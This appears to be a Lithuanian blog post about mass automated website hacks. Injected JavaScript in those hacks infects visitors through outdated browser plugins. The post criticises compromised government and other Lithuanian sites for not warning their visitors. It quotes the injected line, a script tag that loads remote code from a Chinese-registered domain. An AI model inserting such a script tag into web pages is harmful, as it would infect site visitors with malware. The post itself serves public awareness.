Pastaruoju metu internete įvyksta vis daugiau automatizuotų tinklalapių nulaužimų. Laužiama iš karto dideliais kiekiais. Pvz. po 10 000 vnt. iš karto. Ir nesirenkama kas laužiamas. Svarbu didelis kiekis išnaudojant tam tikrus šabloninius tinklalapių pažeidžiamumus. Atakos metu į tinklalapius įterpiamas papildomas kodas. T.y. puslapis šiek tiek patiuninguojamas. Tas tiuningas, tai yra JavaScript’as, kuris tinklalapio lankytojų sistemose ieško pažeidžiamumų ir tuos pažeidžiamumus bando išnaudoti. Pvz. jei turit neatnaujintą kokį nors Adobe Reader’į, seną QuickTime grotuvą ar Flash’o versiją, tai po apsilankymo tokiam nulaužtam puslapyje, kompiuteryje dar turėsit ir kokią nors papildomą žalingą programą. O Jūsų nuomonės apie tai niekas net ir neklaus.
Po visų tokių masinių atakų, pažeisti puslapiai turėdavo žalingą kodą su Šanchajuje ar kur nors kitur Kinijoje registruotais domenais. Paskutinė ataka vyko balandžio mėn. ir į puslapius pridėdavo štai tokį kodą: <script src=http://www.nihaorr1.com/1.js></script>. Kiek iš skaitančių šį tinklaraštį nukentėjo nuo šios atakos? O kiek apie nukentėjusias įmones parašė spauda? Be problemų galim įvertinti kaipgi sekėsi lietuviškiems tinklalapiams. Aišku, kaip gi čia be google’o.
Tarp laimingųjų pateko ir Susisiekimo ministerija, ir policijos komisariatas, o pažiurėję žemiau rasite ir tinklalapius ministraspirmininkas.lt, bonumpublicum.lt, 5ci.lt, books.lt ir t.t. 5ci tai turbūt kiek puslapių turėjo, tai visus ir nulaužė.
Tačiau nei vienas nesugebėjo net tyliai pasakyti ką nors panašaus į “Mieli mūsų tinklalapio lankytojai, nepykit, kad užkrėtėm Jus žalingom programom po Kinijos įsilaužėlių atakos. Nuo žalingų programų galite pasitikrinti taip ir va kaip. O mes prisipažįstame klydę ir kad tai daugiau nepasikartotų darysime taip ir va kaip.” ar kažkaip kitaip įspėti bei atsiprašyti savo lankytojų. O kur atsakomybė prieš kitus? Ypač iš valstybinių įstaigų? Na taip, juk geriau viską susitvarkyti tyliai, gal niekas nieko nepastebės. Bet google’as viską mato. Ir mes irgi matom. O dabar dar turim progą apie tai ir pakalbėti garsiai, ir dar per dantį patraukti…
» Temos: Apie viską, Paieška, Programos
» Žymėtis:
kaip.tik.ten
::
topix.lt
::
del.icio.us

RSS
